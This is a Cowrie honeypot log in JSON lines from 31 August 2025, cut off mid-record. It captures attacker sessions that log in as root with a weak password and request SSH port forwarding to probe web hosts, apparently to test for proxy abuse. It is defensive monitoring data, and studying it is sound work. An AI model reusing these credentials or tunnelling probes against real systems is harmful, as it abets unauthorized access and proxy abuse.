{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:53:36.341281Z","src_ip":"77.83.207.83","session":"012a5cc1a6d6"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:53:36.593115Z","src_ip":"77.83.207.83","session":"012a5cc1a6d6"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":28368,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:28368","sensor":"my-vps","timestamp":"2025-08-31T03:53:36.644574Z","session":"012a5cc1a6d6"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:36.695086Z","src_ip":"77.83.207.83","session":"012a5cc1a6d6"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"77.83.207.83","src_port":11645,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:11645","sensor":"my-vps","timestamp":"2025-08-31T03:53:36.836927Z","session":"012a5cc1a6d6"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:36.888018Z","src_ip":"77.83.207.83","session":"012a5cc1a6d6"}
{"eventid":"cowrie.session.connect","src_ip":"34.14.223.46","src_port":58288,"dst_ip":"1.2.3.4","dst_port":22,"session":"224cfbe32c73","protocol":"ssh","message":"New connection: 34.14.223.46:58288 (1.2.3.4:22) [session: 224cfbe32c73]","sensor":"my-vps","timestamp":"2025-08-31T03:53:37.008821Z"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"77.83.207.83","src_port":23787,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:23787","sensor":"my-vps","timestamp":"2025-08-31T03:53:37.028531Z","session":"012a5cc1a6d6"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:53:37.029856Z","src_ip":"34.14.223.46","session":"224cfbe32c73"}
{"eventid":"cowrie.session.closed","duration":12.755634784698486,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:53:37.047496Z","src_ip":"212.227.235.229","session":"9eb0aa300a22"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:37.078998Z","src_ip":"77.83.207.83","session":"012a5cc1a6d6"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:53:37.130844Z","src_ip":"77.83.207.83","session":"012a5cc1a6d6"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":44689,"dst_ip":"1.2.3.4","dst_port":22,"session":"759d1b99e6d9","protocol":"ssh","message":"New connection: 77.83.207.83:44689 (1.2.3.4:22) [session: 759d1b99e6d9]","sensor":"my-vps","timestamp":"2025-08-31T03:53:37.179943Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:53:37.180984Z","src_ip":"77.83.207.83","session":"759d1b99e6d9"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:53:37.231511Z","src_ip":"77.83.207.83","session":"759d1b99e6d9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38473,"dst_ip":"1.2.3.4","dst_port":23,"session":"10282263a673","protocol":"telnet","message":"New connection: 212.227.235.229:38473 (1.2.3.4:23) [session: 10282263a673]","sensor":"my-vps","timestamp":"2025-08-31T03:53:37.271889Z"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:53:37.277682Z","src_ip":"34.14.223.46","session":"224cfbe32c73"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:53:37.483070Z","src_ip":"77.83.207.83","session":"759d1b99e6d9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":31312,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:31312","sensor":"my-vps","timestamp":"2025-08-31T03:53:37.535641Z","session":"759d1b99e6d9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:37.586434Z","src_ip":"77.83.207.83","session":"759d1b99e6d9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"77.83.207.83","src_port":2561,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:2561","sensor":"my-vps","timestamp":"2025-08-31T03:53:37.728813Z","session":"759d1b99e6d9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:37.779289Z","src_ip":"77.83.207.83","session":"759d1b99e6d9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"77.83.207.83","src_port":23574,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:23574","sensor":"my-vps","timestamp":"2025-08-31T03:53:37.920943Z","session":"759d1b99e6d9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:37.971553Z","src_ip":"77.83.207.83","session":"759d1b99e6d9"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:53:38.023262Z","src_ip":"77.83.207.83","session":"759d1b99e6d9"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":44789,"dst_ip":"1.2.3.4","dst_port":22,"session":"5465e1d56c44","protocol":"ssh","message":"New connection: 77.83.207.83:44789 (1.2.3.4:22) [session: 5465e1d56c44]","sensor":"my-vps","timestamp":"2025-08-31T03:53:38.072495Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:53:38.073406Z","src_ip":"77.83.207.83","session":"5465e1d56c44"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:53:38.123122Z","src_ip":"77.83.207.83","session":"5465e1d56c44"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:53:38.371889Z","src_ip":"77.83.207.83","session":"5465e1d56c44"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":21278,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:21278","sensor":"my-vps","timestamp":"2025-08-31T03:53:38.423057Z","session":"5465e1d56c44"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:38.473068Z","src_ip":"77.83.207.83","session":"5465e1d56c44"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"77.83.207.83","src_port":9575,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:9575","sensor":"my-vps","timestamp":"2025-08-31T03:53:38.616359Z","session":"5465e1d56c44"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:38.667392Z","src_ip":"77.83.207.83","session":"5465e1d56c44"}
{"eventid":"cowrie.login.failed","username":"mongo","password":"123456","message":"login attempt [mongo/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T03:53:38.778297Z","src_ip":"34.14.223.46","session":"224cfbe32c73"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"77.83.207.83","src_port":5551,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:5551","sensor":"my-vps","timestamp":"2025-08-31T03:53:38.808069Z","session":"5465e1d56c44"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:38.858136Z","src_ip":"77.83.207.83","session":"5465e1d56c44"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:53:38.909110Z","src_ip":"77.83.207.83","session":"5465e1d56c44"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":44889,"dst_ip":"1.2.3.4","dst_port":22,"session":"befa093ec638","protocol":"ssh","message":"New connection: 77.83.207.83:44889 (1.2.3.4:22) [session: befa093ec638]","sensor":"my-vps","timestamp":"2025-08-31T03:53:38.957851Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:53:38.958762Z","src_ip":"77.83.207.83","session":"befa093ec638"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:53:39.008597Z","src_ip":"77.83.207.83","session":"befa093ec638"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:53:39.257293Z","src_ip":"77.83.207.83","session":"befa093ec638"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":17978,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:17978","sensor":"my-vps","timestamp":"2025-08-31T03:53:39.308216Z","session":"befa093ec638"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:39.358317Z","src_ip":"77.83.207.83","session":"befa093ec638"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"77.83.207.83","src_port":8598,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:8598","sensor":"my-vps","timestamp":"2025-08-31T03:53:39.500386Z","session":"befa093ec638"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:39.550480Z","src_ip":"77.83.207.83","session":"befa093ec638"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"77.83.207.83","src_port":28320,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:28320","sensor":"my-vps","timestamp":"2025-08-31T03:53:39.692486Z","session":"befa093ec638"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:39.742485Z","src_ip":"77.83.207.83","session":"befa093ec638"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:53:39.793214Z","src_ip":"77.83.207.83","session":"befa093ec638"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":44990,"dst_ip":"1.2.3.4","dst_port":22,"session":"0f5c9484f1d1","protocol":"ssh","message":"New connection: 77.83.207.83:44990 (1.2.3.4:22) [session: 0f5c9484f1d1]","sensor":"my-vps","timestamp":"2025-08-31T03:53:39.843402Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:53:39.844273Z","src_ip":"77.83.207.83","session":"0f5c9484f1d1"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ss